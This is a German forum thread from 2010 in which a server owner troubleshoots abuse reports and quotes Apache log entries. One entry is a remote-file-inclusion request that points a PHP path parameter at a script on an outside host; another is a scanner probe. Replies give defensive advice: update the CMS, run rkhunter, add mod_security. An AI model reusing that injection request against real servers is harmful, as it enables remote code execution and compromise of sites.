# Sicherheitslücke?



## mrairbrush (10. März 2010)

Kriege von Hetzner ständig Abusemeldungen aber teilweise ohne Inhalt. Lediglich das jemand Spam gemeldet hätte. Der Traffic hat sich aber nur reinkommend drastisch erhöht. Wo fängt man am besten mit dem Suchen an?
Kann jemand damit was anfangen?


> "GET
> /include/editfunc.inc.php/?NWCONF_SYSTEM%5bserver_path%5d=http://www.hyonsvc
> .co.kr//bbs//icon/1.txt%3f HTTP/1.1" 500 3560 "-" "Mozilla/5.0" - "-"


Was soll das mit URL Injektion?


----------



## Till (11. März 2010)

Das sieht ganz danach aus, als ob eines der CMS Systeme oder ähnliches auf Deinem System verwundbar ist.

1) Suche das cms bzw script und aktualisiere es. Du kannst z.B. mit:

locate editfunc.inc.php

nach der datei suchen, um die betroffene website eingrenzen zu können.

2) Scan Dein System mit rkhunter:

http://www.rootkit.nl/projects/rootkit_hunter.html

3) Bei URL Injection könnte Dir auch die Installation vom apache mod_security modul zusätzlichen Schutz bieten.


----------



## mrairbrush (11. März 2010)

Der Befehl locate wurde nicht gefunden )

rkhunter hat ein paar Sachen gefunden.



> /usr/bin/awk                                      [ Warning ]
> [11:01:06] Warning: The file properties have changed:
> [11:01:06]          File: /usr/bin/awk
> [11:01:06]          Current hash: c7a7da74a87602ded1bff67da0a33eb29a7b42c5
> ...


----------



## mrairbrush (11. März 2010)

Versuche gerade den mod_security zu installieren. Aber funktioniert leider nicht so einfach wie beschrieben.
Hänge bei
SecUploadDir /var/log/apache2/modsecurity/tmp
fest

apxs2 ist nicht installiert. Woher bekomme ich das? Suche schon aber habe noch nichts gefunden.


----------



## Till (12. März 2010)

Schau mal, ob es apache2 dev Pakete für die von Dir verwendete Linux Distribution gibt und wenn ja, dann installier sie.


----------



## Quest (12. März 2010)

Zu locate:
Der Befehl ist in der default Debian Installation nicht dabei.
Such mal in Aptitude nach locate, dann wirst du fündig. Den genauen Paketnamen hab ich leider nicht im Kopf.
Nach der Installation bitte ein mal 
updatedb 
ausführen um den Suchindex für locate zu aktualisieren.


----------



## mrairbrush (12. März 2010)

Verwende das Lenny von Hetzner und isp config
finde bei Hetzner aber nicht leider


----------



## Till (15. März 2010)

Locate installieren:

apt-get install findutils


----------



## mrairbrush (31. März 2010)

Hatte ein paar Tage Ruhe jetzt gehen die Abusemeldungen wieder los.
HAbe in die Logs gesehen und folgendes häufug gefunden


> "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 377 "-" "-"


----------



## mrairbrush (31. März 2010)

Zitat von Till:


> Locate installieren:
> 
> apt-get install findutils


Funktioniert wohl nicht


> apt:~# apt-get install findutils
> Reading package lists... Done
> Building dependency tree
> Reading state information... Done
> ...


----------

